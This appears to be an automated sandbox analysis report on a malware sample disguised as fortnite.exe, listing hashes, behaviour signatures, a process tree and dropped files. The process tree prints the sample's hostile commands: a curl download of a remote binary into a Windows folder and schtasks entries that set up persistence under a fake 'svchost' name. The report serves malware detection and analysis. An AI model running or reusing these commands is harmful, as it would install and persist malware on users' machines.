Analysis

  • max time kernel
    151s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    17-11-2024 15:41

General

  • Target

    fortnite.exe

  • Size

    1.4MB

  • MD5

    fe46f964b97f65038b33d792041d5ae1

  • SHA1

    78c5f038a61bd6cc176aa6ba404ce3b1066dd3ac

  • SHA256

    5b1344b5474239635dbccf34f061111a440fdf309fc106ab7890902452d9e1f3

  • SHA512

    8f630383500a97b11174b39206bc63732c67e9ee58430f64efa708565ed9a01b737e133639f0a56f936fc9d13f0e234e655c1f2f9c3683931e8c1fa11a507d0f

  • SSDEEP

    24576:PFOaIhahEyuRAmfnkuGKFDflpC+bKlAtc06cd:tUhfnsGzH

Malware Config

Signatures

  • Modifies visibility of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fortnite.exe
    "C:\Users\Admin\AppData\Local\Temp\fortnite.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2044
    • \??\c:\users\admin\appdata\local\temp\fortnite.exe 
      c:\users\admin\appdata\local\temp\fortnite.exe 
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1284
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe
        3⤵
          PID:2916
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c cls
          3⤵
            PID:2920
        • C:\Windows\Resources\Themes\icsys.icn.exe
          C:\Windows\Resources\Themes\icsys.icn.exe
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1796
          • \??\c:\windows\resources\themes\explorer.exe
            c:\windows\resources\themes\explorer.exe
            3⤵
            • Modifies visibility of hidden/system files in Explorer
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Drops file in System32 directory
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2124
            • \??\c:\windows\resources\spoolsv.exe
              c:\windows\resources\spoolsv.exe SE
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1192
              • \??\c:\windows\resources\svchost.exe
                c:\windows\resources\svchost.exe
                5⤵
                • Modifies visibility of hidden/system files in Explorer
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • Drops file in System32 directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2936
                • \??\c:\windows\resources\spoolsv.exe
                  c:\windows\resources\spoolsv.exe PR
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of SetWindowsHookEx
                  PID:2220
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 15:44 /f
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2844
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 15:45 /f
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2540
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 15:46 /f
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3008
            • C:\Windows\Explorer.exe
              C:\Windows\Explorer.exe
              4⤵
                PID:2740

Network

MITRE ATT&CK Enterprise v15

Downloads

        • C:\Windows\Resources\Themes\explorer.exe

          Filesize

          135KB

          MD5

          a711f0925f42a810499b8963f248f81d

          SHA1

          e2d108438a52befe6ff8c76f830373224276ebd0

          SHA256

          ca0c9438d7e0bb0abe5cd9ea49028d9bf53de2394d63991a036448eec36adcc7

          SHA512

          fc374f708ae6cb6fb558fcbcca9a30e3e0d4764f77cb3208a553815b063c762ab97d9f1aa2eafe5cdad36f04a3d086bce2d58767ff52b5b44c13775f7ee42634

        • \Users\Admin\AppData\Local\Temp\fortnite.exe 

          Filesize

          1.2MB

          MD5

          3287792eb50754ea8b3639bca36a8a99

          SHA1

          d46b073edbbfcd8027d2df2b1ccb93f90bec3319

          SHA256

          9c3dd5e7ce8aa6114c6d881a64eefb47f5e6557bbc84cbfa705318674b43fecc

          SHA512

          fada9632e159e6225997c8c6d67fb09f4ce48c1c444d0205ceb8a4004f7006eb7c55ce2823d1f33672bbea36d29e6111cd5021b63ee2fbd3f6dbf2847ce78b38

        • \Windows\Resources\Themes\icsys.icn.exe

          Filesize

          135KB

          MD5

          db2a3be4d0ba7fbe7984689f57969053

          SHA1

          22eeabb26614ba2a32b0869ae544c67c02f9262b

          SHA256

          2055a054d6084815d3e23fdc1cfa776bea0cf21a2eb6194a0d453eec3dead956

          SHA512

          7b3cab337dfe217824ad754c02561f2bdb82eb92d3462503212870e4adb2f6b1e10392e3dc127883a3ef8c39e1c0d9ed946609831c114cc42746fa0f680390d4

        • \Windows\Resources\spoolsv.exe

          Filesize

          135KB

          MD5

          49af1e57561db06cf5460d2bd4bfac27

          SHA1

          06fd729a5828e737607618caac0b88c820f304cf

          SHA256

          fa61bb735e38be8e69149c644c92a270dd5f805bbf2cf07db57fa090845be4bb

          SHA512

          78c57b3c3410c37d998ea37a8c624d4b6e64f646f6e2aa63cbcc947b9a654411dc20e29109cca8e95e5d8ca75966bfd962ed160fcb16a583fc7e5b62439d7385

        • \Windows\Resources\svchost.exe

          Filesize

          135KB

          MD5

          a74cc12915ee1a4baee804ef46526b9e

          SHA1

          ac979475cda92036255b5dae36fef12bda2e7539

          SHA256

          1b249b1b4494cb278cc37dde36799a89898650455493a31457aa4538fcfe5945

          SHA512

          896322b4cbfb52e445ff3e7341dd19e70706bf6826b4425120911dae3898572a8ac295067afecc1d87006a5c07153640ef4f106167c90d470b3755fb3acfd1a7

        • memory/1192-57-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB

        • memory/1796-25-0x0000000000200000-0x000000000021F000-memory.dmp

          Filesize

          124KB

        • memory/1796-58-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB

        • memory/2044-11-0x00000000002C0000-0x00000000002DF000-memory.dmp

          Filesize

          124KB

        • memory/2044-0-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB

        • memory/2044-59-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB

        • memory/2124-60-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB

        • memory/2220-56-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB

        • memory/2936-51-0x00000000002F0000-0x000000000030F000-memory.dmp

          Filesize

          124KB

        • memory/2936-61-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB